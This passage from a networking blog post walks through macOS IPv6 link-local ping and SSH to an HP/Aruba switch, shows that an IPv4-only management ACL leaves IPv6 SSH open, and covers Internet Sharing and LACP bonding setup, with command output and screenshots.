<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">1</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.498</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">2</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.853</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">3</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.865</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">4</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.374</span> ms
<span style="color: #555555;">^</span>C
<span style="color: #555555;">---</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span> ping6 statistics <span style="color: #555555;">---</span>
<span style="color: #ff6600;">5</span> packets transmitted, <span style="color: #ff6600;">5</span> packets received, <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> packet loss
<span style="color: #336666;">round</span><span style="color: #555555;">-</span>trip <span style="color: #336666;">min</span><span style="color: #555555;">/</span>avg<span style="color: #555555;">/</span><span style="color: #336666;">max</span><span style="color: #555555;">/</span>std<span style="color: #555555;">-</span>dev <span style="color: #555555;">=</span> <span style="color: #ff6600;">1.374</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1.965</span><span style="color: #555555;">/</span><span style="color: #ff6600;">3.237</span><span style="color: #555555;">/</span><span style="color: #ff6600;">0.665</span> ms
</pre></div><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using="">You can also use this format of ping6. Notice the %vlan0 after the IPv6 address. If you were using interface en7 instead of vlan0, you would append en7 to the IPv6 address instead.</div><div --="" generated="" hilite.me="" html="" using=""><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ping6 fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0
PING6(<span style="color: #ff6600;">56</span><span style="color: #555555;">=</span><span style="color: #ff6600;">40</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span> <span style="color: #336666;">bytes</span>) fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0 <span style="color: #555555;">--></span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">0</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.365</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">1</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.815</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">2</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.848</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">3</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.724</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">4</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.771</span> ms
<span style="color: #555555;">^</span>C
<span style="color: #555555;">---</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0 ping6 statistics <span style="color: #555555;">---</span>
<span style="color: #ff6600;">5</span> packets transmitted, <span style="color: #ff6600;">5</span> packets received, <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> packet loss
<span style="color: #336666;">round</span><span style="color: #555555;">-</span>trip <span style="color: #336666;">min</span><span style="color: #555555;">/</span>avg<span style="color: #555555;">/</span><span style="color: #336666;">max</span><span style="color: #555555;">/</span>std<span style="color: #555555;">-</span>dev <span style="color: #555555;">=</span> <span style="color: #ff6600;">0.724</span><span style="color: #555555;">/</span><span style="color: #ff6600;">0.905</span><span style="color: #555555;">/</span><span style="color: #ff6600;">1.365</span><span style="color: #555555;">/</span><span style="color: #ff6600;">0.234</span> ms
</pre></div>
<div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using="">Excellent, now let's check the SSH port with nmap on the IPv6 Interface. </div><div --="" generated="" hilite.me="" html="" using=""><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">nmap <span style="color: #555555;">-</span>e vlan0 <span style="color: #555555;">-</span>sV <span style="color: #555555;">-</span>p22 <span style="color: #555555;">-</span><span style="color: #ff6600;">6</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span>
Starting Nmap <span style="color: #ff6600;">7.91</span> ( https:<span style="color: #555555;">//</span>nmap<span style="color: #555555;">.</span>org ) at <span style="color: #ff6600;">2021</span><span style="color: #555555;">-</span><span style="color: #ff6600;">04</span><span style="color: #555555;">-</span><span style="color: #ff6600;">18</span> <span style="color: #ff6600;">14</span>:<span style="color: #ff6600;">43</span> PDT
Nmap scan report <span style="color: #006699; font-weight: bold;">for</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span>
Host <span style="color: black; font-weight: bold;">is</span> up (<span style="color: #ff6600;">0.0018</span>s latency)<span style="color: #555555;">.</span>
PORT STATE SERVICE VERSION
<span style="color: #ff6600;">22</span><span style="color: #555555;">/</span>tcp <span style="color: #336666;">open</span> ssh Mocana NanoSSH <span style="color: #ff6600;">6.3</span> (protocol <span style="color: #ff6600;">2.0</span>)
Service detection performed<span style="color: #555555;">.</span> Please report <span style="color: #336666;">any</span> incorrect results at https:<span style="color: #555555;">//</span>nmap<span style="color: #555555;">.</span>org<span style="color: #555555;">/</span>submit<span style="color: #555555;">/</span> <span style="color: #555555;">.</span>
Nmap done: <span style="color: #ff6600;">1</span> IP address (<span style="color: #ff6600;">1</span> host up) scanned <span style="color: black; font-weight: bold;">in</span> <span style="color: #ff6600;">0.63</span> seconds
</pre></div>
<div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using=""><br /></div><div --="" generated="" hilite.me="" html="" using="">So how do we SSH using the IPv6 address?</div><div --="" generated="" hilite.me="" html="" using=""><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; text-align: left; width: auto;"><pre style="line-height: 125%; margin: 0px;">From the mac
ssh vector<span style="color: #9999ff;">@fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0
vector<span style="color: #9999ff;">@fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #cc3300;">'s password:</span>
HP J9727A <span style="color: #ff6600;">2920</span><span style="color: #555555;">-</span><span style="color: #ff6600;">24</span>G<span style="color: #555555;">-</span>PoE<span style="color: #555555;">+</span> Switch
Software revision WB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0010</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">That worked. Without IPv6 specific ACLs and with IPv6 autoconfig enabled, SSH is open to anyone that tries IPv6. However, if you noticed, the autoconfig address starts with fe80 which means it is link local so the attacker would have to be on the same Vlan as the interface.</div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">What if I restrict management access to only subnet 10.10.100.0/24</h4><div style="text-align: left;">So let's try it out. </div><div style="text-align: left;">First I'll ssh to the IPv4 address to make sure that works:</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ssh vector<span style="color: #9999ff;">@10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254</span>
vector<span style="color: #9999ff;">@10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254</span><span style="color: #cc3300;">'s password:</span>
HP J9727A <span style="color: #ff6600;">2920</span><span style="color: #555555;">-</span><span style="color: #ff6600;">24</span>G<span style="color: #555555;">-</span>PoE<span style="color: #555555;">+</span> Switch
Software revision WB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0010</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">That worked, so I will add an ip authorized-manager as 10.10.100.0/24 and try to ssh using the IPv4 address. Remember, our IPv4 address is 10.10.10.100, so it's not on the allow list.</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">HP<span style="color: #555555;">-</span><span style="color: #ff6600;">2920</span><span style="color: #555555;">-</span><span style="color: #ff6600;">24</span>G<span style="color: #555555;">-</span>PoEP(config)<span style="color: #0099ff; font-style: italic;"># ip authorized-managers 10.10.100.0 255.255.255.0 access manager</span>
<span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">the</span> MacBook
ssh vector<span style="color: #9999ff;">@10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">254</span>
kex_exchange_identification: Connection closed by remote host
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">As you can see, ssh from the MacBook now fails.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">But what if I try it from the IPv6 address?</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ssh vector<span style="color: #9999ff;">@fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0
HP J9727A <span style="color: #ff6600;">2920</span><span style="color: #555555;">-</span><span style="color: #ff6600;">24</span>G<span style="color: #555555;">-</span>PoE<span style="color: #555555;">+</span> Switch
Software revision WB<span style="color: #555555;">.</span><span style="color: #ff6600;">16.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0010</span>
Your previous successful login (<span style="color: #006699; font-weight: bold;">as</span> manager) was on <span style="color: #ff6600;">2021</span><span style="color: #555555;">-</span><span style="color: #ff6600;">04</span><span style="color: #555555;">-</span><span style="color: #ff6600;">18</span> <span style="color: #ff6600;">07</span>:<span style="color: #ff6600;">35</span>:<span style="color: #ff6600;">00</span>
<span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.100</span>
There has been <span style="color: #ff6600;">1</span> unsuccessful login attempt since your previous login,
most recently on <span style="color: #ff6600;">1990</span><span style="color: #555555;">-</span><span style="color: #ff6600;">01</span><span style="color: #555555;">-</span><span style="color: #ff6600;">01</span> <span style="color: #ff6600;">07</span>:<span style="color: #ff6600;">36</span>:<span style="color: #ff6600;">16</span>
Connection to fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0 closed by remote host<span style="color: #555555;">.</span>
Connection to fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0 closed<span style="color: #555555;">.</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">Since IPv6 isn't disallowed we logged right in. You can see the failed attempt from 10.10.10.100 in the log.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">Now how would you ssh to the MacBook from the Aruba 2930f?</h4><div style="text-align: left;"><br /></div><div style="text-align: left;">If we look at "show management" again we see that Vlan 100 has IPv6 enabled and is set for autoconfig. So, just like on the MacBook, we use ssh <IPv6 Address> then append the Vlan id, %vlan100 in this case.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">I didn't have an ssh server running on my MacBook so it didn't succeed but it tried.</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"> Interface Name : Management
IPv6 Status : Enabled
Address <span style="color: #555555;">|</span> Address
Origin <span style="color: #555555;">|</span> IPv6 Address<span style="color: #555555;">/</span>Prefix Length Status
<span style="color: #555555;">----------</span> <span style="color: #555555;">+</span> <span style="color: #555555;">-------------------------------------------</span> <span style="color: #555555;">-----------</span>
autoconfig <span style="color: #555555;">|</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">/</span><span style="color: #ff6600;">64</span> preferred
From the <span style="color: #ff6600;">2930</span>f
ssh fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan100
The SSH connection failed: Connection refused<span style="color: #555555;">.</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">Looking at IPv6 routes</h4><div>You still use the netstat -nr command. For IPv6 you scroll down past the IPv4 routes. I have a link in the reference section at the end of the blog that explains the flags. </div><div><br /></div><div>For our example, here is the IPv6 table:</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">netstat <span style="color: #555555;">-</span>nr
Routing tables
<span style="color: #555555;">.</span>
<span style="color: #555555;">.</span> IPv4 detail removed <span style="color: #006699; font-weight: bold;">for</span> brevity
<span style="color: #555555;">.</span>
Internet6:
Destination Gateway Flags Netif Expire
fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0 <span style="color: #ff6600;">98.</span>f2<span style="color: #555555;">.</span>b3<span style="color: #555555;">.</span>fe<span style="color: #555555;">.</span><span style="color: #ff6600;">88.80</span> UHLWI vlan0
</pre></div>
<h3 id="ICS" style="text-align: left;"><br /></h3><h3 id="ICS" style="text-align: left;">Internet Connection Sharing</h3><p>Sometimes you need to provide Internet access to a new network to complete your work. For example, recently I was installing a greenfield Ubiquiti network. It included a Cloud Key so it needed Internet access to register and be fully functional. Unfortunately, the Internet access hadn't been installed yet. </p><p>I plugged in a second USB Ethernet adapter, connected wireless to my phone set to hotspot mode and used the "Sharing" System Preferences app to configure the sharing. </p><p></p><ul style="text-align: left;"><li>Set "Share your connection from:" to wifi</li><li>Put put a check next to the USB Ethernet interface in "To computers using:"</li><li>Under "Service" put a check next to "Internet Sharing"<span> </span></li></ul><p></p><p>Now connect the USB Ethernet to the device you need to share Internet with. I have found that it doesn't matter if the USB Ethernet is set to DHCP or manual. The device using the connection gets an address in the range 192.168.2.0/24</p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDV35odoNK61QMiPOx5dAGwozfou9BrRg_gJLy3k2fc1ezxbhCE4oSkfDF9HMDYeTGfMTNWmTtXalVRAJjkzxtAjL7WMwCNZ0r4FhAU4Q9HPdCRaKbVzyAF3lRer9qYmMX8_jnPT-0iZ-o/s1560/Screen+Shot+2021-04-17+at+22.33.27.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1312" data-original-width="1560" height="419" id="id_7e60_fffe_6951_fb79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDV35odoNK61QMiPOx5dAGwozfou9BrRg_gJLy3k2fc1ezxbhCE4oSkfDF9HMDYeTGfMTNWmTtXalVRAJjkzxtAjL7WMwCNZ0r4FhAU4Q9HPdCRaKbVzyAF3lRer9qYmMX8_jnPT-0iZ-o/w498-h419/Screen+Shot+2021-04-17+at+22.33.27.png" style="height: auto; width: 498px;" width="498" /></a></div><p><br /></p><h3 id="LACP" style="text-align: left;">Combine Ethernet ports into a virtual port (LACP - Port Channel)</h3><p>I haven't had a reason to bond two USB-C Ethernet adapters into an LACP bond for bandwidth on my laptop(!) but I have had a need to verify the configuration of a "Trunk" on an Aruba switch or a "Port-Channel" on a Cisco switch. </p><p>It's very easy on Big Sur, again, just not so obvious. One caveat is that the bond has to use LACP. To get started:</p><p>In the network preferences app, click the funny little icon that looks like a circle with 3 dots in it:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaakfE0p0FU4BnAj8Hw8Bkl1gabZMq9JdRCWXCMgM_q623ht9euvlqy2ptW9Hhh-JN3bQZ1v_FhYAzlNmJKs-on-eJXky_pIfjzOYl7r_QaUMOgN6vRC30COGhaHGD_nDHlc0E2a4crOcW/s179/circle-3Dots.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="48" data-original-width="179" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaakfE0p0FU4BnAj8Hw8Bkl1gabZMq9JdRCWXCMgM_q623ht9euvlqy2ptW9Hhh-JN3bQZ1v_FhYAzlNmJKs-on-eJXky_pIfjzOYl7r_QaUMOgN6vRC30COGhaHGD_nDHlc0E2a4crOcW/w289-h78/circle-3Dots.png" width="289" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Click on "Manage Virtual Interfaces..."</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeTdSXgtSadX2NjLMqHoAmCxQXWXjkHkPZ6olrms01gGyyNKJ-KjJew6EcP2LRgh02GW935yVzJgID8IU0OETQ6coz_oGcSvIKvcre5cU-XyqnVDpUcka7D74kOBk54EC_GVVOFPeEav8m/s528/Screen+Shot+2021-04-19+at+19.05.43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="528" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeTdSXgtSadX2NjLMqHoAmCxQXWXjkHkPZ6olrms01gGyyNKJ-KjJew6EcP2LRgh02GW935yVzJgID8IU0OETQ6coz_oGcSvIKvcre5cU-XyqnVDpUcka7D74kOBk54EC_GVVOFPeEav8m/w226-h195/Screen+Shot+2021-04-19+at+19.05.43.png" width="226" /></a></div><p>Click the "+" sign</p><p>Click on "New Link Aggregate..."</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTRmVEBLWMOoeq6AgSEDG4q7AJweukdKCAngLABtbzh2M2TCYWMkmOYmhw4neVOkt0IU_yqHO6K2u7S6ZIoo34bFkhVnKRx5Mhx3acjATSPyKOqItvKnaYYVJ6JpMRsE1eTQSmGnlLNF_/s818/Screen+Shot+2021-04-19+at+11.27.49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="818" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTRmVEBLWMOoeq6AgSEDG4q7AJweukdKCAngLABtbzh2M2TCYWMkmOYmhw4neVOkt0IU_yqHO6K2u7S6ZIoo34bFkhVnKRx5Mhx3acjATSPyKOqItvKnaYYVJ6JpMRsE1eTQSmGnlLNF_/s320/Screen+Shot+2021-04-19+at+11.27.49.png" width="320" /></a></div><div><br /></div><div><br /></div>Enter a descriptive name for the bond and check the two USB Ethernet interfaces:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDlionvONZMz97AHsqJkC77adl83fwlqxnbTh99tgIrHVUL96wQkE_kMe-Ux90DoCoxqu8961E9hJnqR1t_XDQ626HyKzinBfV2ceQBUba4Et4hsD81JgSFrj2A4OLJjf0fUx7dIn1bJR/s818/Screen+Shot+2021-04-19+at+11.28.17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="492" data-original-width="818" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDlionvONZMz97AHsqJkC77adl83fwlqxnbTh99tgIrHVUL96wQkE_kMe-Ux90DoCoxqu8961E9hJnqR1t_XDQ626HyKzinBfV2ceQBUba4Et4hsD81JgSFrj2A4OLJjf0fUx7dIn1bJR/s320/Screen+Shot+2021-04-19+at+11.28.17.png" width="320" /></a></div><br /><p>Click "Create"</p><p>You should see the new bond with the BSD Name "Bond0"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia_SBEpK7yncyOcNvukdAOle7xyvdsUiPOH-NNRpuxbIBzGMRT1EzWiy1-QuN8fR45-2S65h13bVTGYUw9Ro9U0UZhpzqL9SDv1k3RePJUIFD0UtTauAZ_t1Asf97xliBopoGeC8mJvzFl/s826/Screen+Shot+2021-04-19+at+11.28.29.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="826" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia_SBEpK7yncyOcNvukdAOle7xyvdsUiPOH-NNRpuxbIBzGMRT1EzWiy1-QuN8fR45-2S65h13bVTGYUw9Ro9U0UZhpzqL9SDv1k3RePJUIFD0UtTauAZ_t1Asf97xliBopoGeC8mJvzFl/s320/Screen+Shot+2021-04-19+at+11.28.29.png" width="320" /></a></div><div><br /></div>Click "Done"<br /><p>You can now connect the Ethernet cables to the switch. As we found earlier, the Bond won't show "Connected" until it gets a DHCP assigned address or you manually assign a static IP address.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLUI-c9vyELbix7ZOVQTNbQITtAOwPhCLUIOZG88aqdN3YNVV97SJu9SRWPmp56LTXtjKiPUTKfwgQhlOOfaeo4nlasmG38dxQ0fFIHC47No92KDP7XUW8n3ki8EUpVRkQY4QNoZkgMJ7L/s1560/Screen+Shot+2021-04-19+at+12.25.31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1378" data-original-width="1560" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLUI-c9vyELbix7ZOVQTNbQITtAOwPhCLUIOZG88aqdN3YNVV97SJu9SRWPmp56LTXtjKiPUTKfwgQhlOOfaeo4nlasmG38dxQ0fFIHC47No92KDP7XUW8n3ki8EUpVRkQY4QNoZkgMJ7L/w393-h347/Screen+Shot+2021-04-19+at+12.25.31.png" width="393" /></a></div>In this example, I set a static address since this Vlan didn't have a DHCP server. Here is what the interfaces look like in the terminal.</div><div><br /></div><div><br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">en0: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8863</span><span style="color: #555555;"><</span>UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
options<span style="color: #555555;">=</span><span style="color: #ff6600;">400</span><span style="color: #555555;"><</span>CHANNEL_IO<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">50</span>:ed:<span style="color: #ff6600;">3</span>c:<span style="color: #ff6600;">22</span>:be:<span style="color: #ff6600;">32</span>
inet6 fe80::<span style="color: #ff6600;">1465</span>:e07c:<span style="color: #ff6600;">8</span>c73:<span style="color: #ff6600;">4</span>b87<span style="color: #555555;">%</span>en0 prefixlen <span style="color: #ff6600;">64</span> secured scopeid <span style="color: #ff6600;">0xa</span>
inet <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.143</span> netmask <span style="color: #ff6600;">0xffffff00</span> broadcast <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.255</span>
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
media: autoselect
status: active
en6: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8963</span><span style="color: #555555;"><</span>UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
